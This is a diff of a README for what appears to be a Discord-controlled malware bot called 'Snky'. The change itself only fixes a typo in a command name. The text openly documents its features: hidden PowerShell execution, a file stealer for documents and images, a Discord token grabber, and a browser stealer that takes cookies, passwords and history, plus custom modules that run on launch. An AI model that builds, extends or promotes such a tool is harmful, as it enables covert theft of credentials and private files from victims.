richa-z/Snky/README.md

 - **.pws** - Executes a powershell command.
 No output visible. ``.pws <cmd>``
 - **.file_collector** - Run a file stealer wich collects ``.txt, .docx, .pdf, .csv`` files.
 If enabled in it's config, also collects ``.png, .jpg, .jpeg, .web`` files, however the size may exceed max discord limit.
 - **.token_grab** - Run a discord token grabber.
-- **.bwrowser_grab** - Run a browser stealer.
+- **.browser_grab** - Run a browser stealer.
 Collects cookies, password, data, history and download history.

 This project supports custom modules.
 If you want to add your own script (not a command), create it and put it into the ```/modules``` folder.
 The bot runs these when launching itself.
 For reference see ```example_module.py``` in ```/modules```